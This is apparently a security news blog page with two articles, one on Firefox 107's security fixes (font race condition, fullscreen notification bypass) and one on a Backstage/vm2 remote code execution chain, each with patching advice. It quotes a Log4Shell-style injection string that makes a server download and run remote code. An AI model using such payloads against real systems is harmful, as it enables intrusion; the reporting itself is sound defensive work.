On the other hand, if no one says anything, then nothing will or can be done.

Below, we’ve listed scam reporting links for various Anglophone countries:

 AU: Scamwatch (Australian Competition and Consumer Commission) https://www.scamwatch.gov.au/about-scamwatch/contact-us CA: Canadian Anti-Fraud Centre https://antifraudcentre-centreantifraude.ca/index-eng.htm NZ: Consumer Protection (Ministry of Business, Innovation and Employment) https://www.consumerprotection.govt.nz/general-help/scamwatch/scammed-take-action/ UK: ActionFraud (National Fraud and Cyber Crime Reporting Centre) https://www.actionfraud.police.uk/ US: ReportFraud.ftc.gov (Federal Trade Commission) https://reportfraud.ftc.gov/ ZA: Financial Intelligence Centre https://www.fic.gov.za/Resources/Pages/ScamsAwareness.aspx
News

Firefox fixes fullscreen fakery flaw – get the update now!

by

Firefox’s latest once-every-four-weeks security update is out, bringing the popular alternative browser to version 107.0, or Extended Support Release (ESR) 102.5 if you prefer not to get new feature releases every month.

(As we’ve explained before, the ESR version number tells you which feature set you have, plus the number of times it’s had security updates since then, which you can reocncile this month by noticing that 102+5 = 107.)

Fortunately, there are no zero-day patches this time – all the vulnerabilities on the fix-list were either responsibly disclosed by external researchers, or found by Mozilla’s own bug hunting team and tools.

Font entanglement

The highest severity level is High, which applies to seven different bugs, four of which are memory mismanagement flaws that could lead to a program crash, including CVE-2022-45407, which an attacker could exploit by loading a font file.

Most bugs relating to font file usage are caused by the fact that font files are complex binary data structures, and there are many different file formats that products are expected to support.

This means that font-related vulnerabilities usually involve feeding a deliberately booby-trapped font file into the browser so that it goes wrong trying to process it.

But this bug is different, because an attacker could use a legitimate, correctly-formed font file to trigger a crash.

The bug can be triggered not by content but by timing: when two or more fonts are loaded at the same time by separate background threads of execution, the browser may mix up the fonts it’s processing, potentially putting data chunk X from font A into the space allocated for data chunk Y from font B and thereby corrupting memory.

Mozilla describes this as a “potentially exploitable crash”, although there is no suggestion that anyone, let alone an attacker, has yet figured out how to build such an exploit.

Fullscreen considered harmful

The most interesting bug, at least in our opinion, is CVE-2022-45404, described succintly simply as a “fullscreen notification bypass”.

If you’re wondering why a bug of this sort would justify a severity level of High, it’s because giving control over every pixel on the screen to a browser window that is populated and controlled by untrusted HTML, CSS and JavaScript…

…would be surprisingly handy for any treacherous website operators out there.

We’ve written before about so-called Browser-in-the-Browser, or BitB, attacks, where cybercriminals create a browser popup that matches the look and feel of an operating system window, thus providing a believable way of tricking you into trusting something like a password prompt by passing it off as a security intervention by the system itself:

One way to spot BitB tricks is to try dragging a popup you’re not sure about out of the browser’s own window.

If the popup remains corralled inside the browser, so you can’t move it to a spot of its own on the screen, then it’s obviously just part of the web page you’re looking at, rather than a genuine popup generated by the system itself.

But if a web page of external content can take over the entire display automatically without provoking a warning beforehand, you might very well not realise that nothing you see can be trusted, no matter how realistic it looks.

Sneaky crooks, for example, could paint a fake operating system popup inside a fake browser window, so that you could indeed drag the “system” dialog anywere on the screen and convince yourself it was the real deal.

Or the crooks could deliberately display the latest pictorial background (one of those Like what you see? images) chosen by Windows for the login screen, thus providing a measure of visual familiarity, and thereby trick you into thinking that you had inadvertently locked the screen and needed to reauthenticate to get back in.

We’ve deliberately mapped the otherwise unused but easy-to-find PrtSc key on our Linux laptop to lock the screen instantly, reinterpreting it as a handyProtect Screen button intead of Print Screen. This means we can reliably and rapidly lock the computer with a thumb-tap every time we walk or turn away, no matter how briefly. We don’t press it unintentionally very often, but it does happen from time to time.

What to do?

Check that you’re up to date, which is a simple matter on a laptop or desktop computer: Help > About Firefox (or Apple Menu > About) will do the trick, popping up a dialog that tells you if you are current or not, and offering to get the latest version if there’s a new one you haven’t downloaded yet.

On mobile devices, check with the app for the software marketplace you use (e.g. Google Play on Android and the Apple App Store on iOS) for updates.

(On Linux and the BSDs, you may have a Firefox build that is provided by your distro; if so, check with your distro maintainer for the latest version.)

Remember, even if you have automatic updating turned on and it usually works reliably, it’s worth checking anyway, given that it only takes a few seconds to make sure nothing went wrong and left you unprotected after all.

News

Log4Shell-like code execution hole in popular Backstage dev tool

by

Researchers at cloud coding security company Oxeye have written up a critical bug that they recently discovered in the popular cloud development toolkit Backstage.

Their report includes an explanation of how the bug works, plus proof-of-concept (PoC) code showing how to exploit it.

Backstage is what’s known as a cloud developer portal – a sort of business logic backend that makes it easy to build web-based APIs (application programming interfaces) to allow coders inside and outside your business to interact with your online services.

In the words of the project itself, originally created at Spotify but now open-sourced on GutHub:

Backstage is an open platform for building developer portals. Powered by a centralized software catalog, Backstage restores order to your microservices and infrastructure and enables your product teams to ship high-quality code quickly — without compromising autonomy.

Backstage unifies all your infrastructure tooling, services, and documentation to create a streamlined development environment from end to end.

No, we don’t truly know what that means, either, but we do know that the toolkit is written in JavaScript, runs using the server-side JavaScript system node.js, and draws in a web of supply chain dependencies from the NPM ecosystem.

NPM is short for Node Package Manager, an automated toolkit for ensuring that your back-end JavaScript code can easily make use of a wide range of open source libraries that provide popular, pre-written helper tools for everything from cryptography and database management to logging and version control.

Remote code execution

Unfortunately, the bug disclosed today, if unpatched, could give unauthenticated outsiders (loosely, anyone who can make API connections to your servers) a way to trigger remote code execution (RCE) inside the business-logic servers on your network.

Fortunately, however, if we have interpreted Oxeye’s writeup correctly, the attack they describe for their Backstage RCE depends on a sequence of coding flaws that ultimately depend on a specific bug, designated CVE-2022-36067 in a supply-chain component that Backstage relies on called vm2.

In case you’re wondering, vm2 is a general-purpose NPM module that implements a “virtual machine sandbox” that aims to make potentially risky JavaScript a bit safer to run on your servers.

That CVE-2022-36067 bug in vm2 was reported back in August 2022 by Oxeye itself (who gave it a PR-friendly name of “Sandbreak”, because it broke out of the sandbox), and patched promptly by the vm2 team almost three months ago.

So, as far as we can see, if you’re a Backstage user you will want to make sure that you have patched all at-risk components in your Backstage setup…

…but if you patched the vm2 component that was vulnerable to Sandbreak all those months ago, then it seems you aren’t directly vulnerable to the exploit described in Oxeye’s latest disclosure.

Also, if your Backstage servers are configured as good cybersecurity guidelines would suggest, with authentication required at both the network edge and inside the network, you won’t be at risk of random “for researcher purposes only” probes from “helpful” individuals determined to show that they are interested in cyberthreat “research”.

An “Emmenthal cheese” attack

Simply put, the newly disclosed security problems are the side-effect of a series of security issues, like holes in slices of Emmenthal cheese that could be permeated in sequence if an attacker is able to line up at least one hole on each slice.

As we understand it, Backstage includes a component called Scaffolder, which, as the name suggests, helps you to manage the various addons (known as plugins) that your developer community might want or need.

Scaffolder, in turn, makes use of a message logging system from Mozilla known as Nunjucks, which includes what’s known as string templating in node.js circles, as string interpolation in the Java world, and as string substitution to sysadmins who use command shells such as Bash.

If string interpolation rings a bell, it’s probably because it lay at the heart of the Log4Shell vulnerability back in December 2021, and of the Follina bug in the middle of 2022.

It’s where you get to rewrite the contents of a logging message based on special “coding characters” in a string template, so that a string such as $USER might be replaced with the account name being used by the server, or ${PID} might retrieve the current process ID.

In the extreme case of Log4Shell, the curious looking incantation ${jndi:ldap://example.com:8888/malware} could directly trick the server into downloading a program called malware from example.com and silently running it in the background.

In other words, you need to make absolutely certain that data arriving from an untrusted source, such as an outside user, is never passed blindly into a string templating or string interpolation function to be used as the template text itself.

If a remote user, for instance, tries to trick your server by giving their username as ${{RISKY}} (assuming the templating library uses ${{...}} as its special marker), you need to ensure that your logging code will correctly record that naughty-looking text literally as it was received…

…rather than allowing the text being logged to take control over the logging function itself!

In the words of an old nursery rhyme, you need to ensure that you don’t end up singing, “There’s a hole in my ${{BUCKET}}, dear Liza, dear Liza, there’s a hole in my ${{BUCKET}}, dear Liza. A hole!”

Wrapped in a safety blanket

To be fair, the perhaps-too-powerful templating/interpolation functionality of Nunjucks is wrapped by Backstage inside yet another supply-chain component, namely the aforementioned sandboxing system vm2, which is supposed to restrict the danger that a malicious user could do with booby-trapped input data.

Unfortunately, Oxeye researchers were able to pair their newly-discovered string templating code-triggering paths in Backstage + Scaffolder + Nunjucks with the older CVE-2022-36067 vulnerability in the vm2 security wrapper in order to achieve potential remote code execution on a Backstage server.

What to do?

If you’re a Backstage user:

  • Ensure you have the latest versions of Backstage and its dependencies, including the plugin-scaffolder-backend component. According to Oxeye, the relevant bugs in the Backstage code were patched by 01 September 2022, so that any official point release after that data should include the fixes. At the time of writing [2022-11-1T16:00Z], that includes Backstage 1.6.0, 1.7.0 and 1.8.0, released on 2022-09-21, 2022-10-18, and 2022-11-15 respectively.
  • Check that your Backstage installation has authentication configured as you expect. Oxeye claims that authentication is off by default, and that after following the Backstage guidelines, backend servers (which are probably not supposed to be exposed externally anyway) still allowed unauthenticated access. That may be what you want, but we recommend using this issue as a reason to check that your setup matches your intentions.
  • Check which parts of your Backstage infrastructure can be reached from the internet. Once again, use this issue as a reason to scan your own network from the outside if you haven’t done so recently.

If you are a node.js/NPM user:

  • Ensure you have the latest version of the vm2 sandbox component. You may have this installed as a dependency of other software you use, even if you don’t have Backstage. The CVE-2022-36067 vulnerability was patched on 2022-08-28, so you want vm2 version 3.9.11 or later.

If you are a programmer:

  • Be as defensive as you can when calling powerful logging functions. If you us a logging service (including Nunjucks or Log4J) that includes powerful templating/interpolation features, turn off any features you don’t need so that they can’t be exploited by mistake. Ensure that untrusted input is never itself used as a template, thus preventing attackers from rolling their own directly dangerous input strings.
  • Regardless of any other precautions in place, sanitise your your logging inputs and outputs. Remember that someone else will need to open your logfiles in the future. Non’t allow any inadvertent booby-traps to get written into your logfile where they could cause trouble later on, such as HTML fragments with script tags left in. (Someone might open the file in a browser by mistake.)

Even when you receive input from a trusted source, there’s rarely any reason not to put it through your own sanitisation checks before you use it.

(You may occasionally justify an exception, for example for performance reasons, but it should be an exception, not the rule.)

Firstly, checking again helps you spot errors that previous coders may have made in good faith; secondly, it helps to limit the spread of bad or booby-trapped data if some other part of your ecosystem gets compromised.

The thing about those slices of Emmenthal cheese we mentioned earlier on is that although they’re permeable if at least one hole lines up on every sheet…

…they’re impermeable if there’s at least one sheet with holes that don’t line up at all!

Latest Blog

View All
go top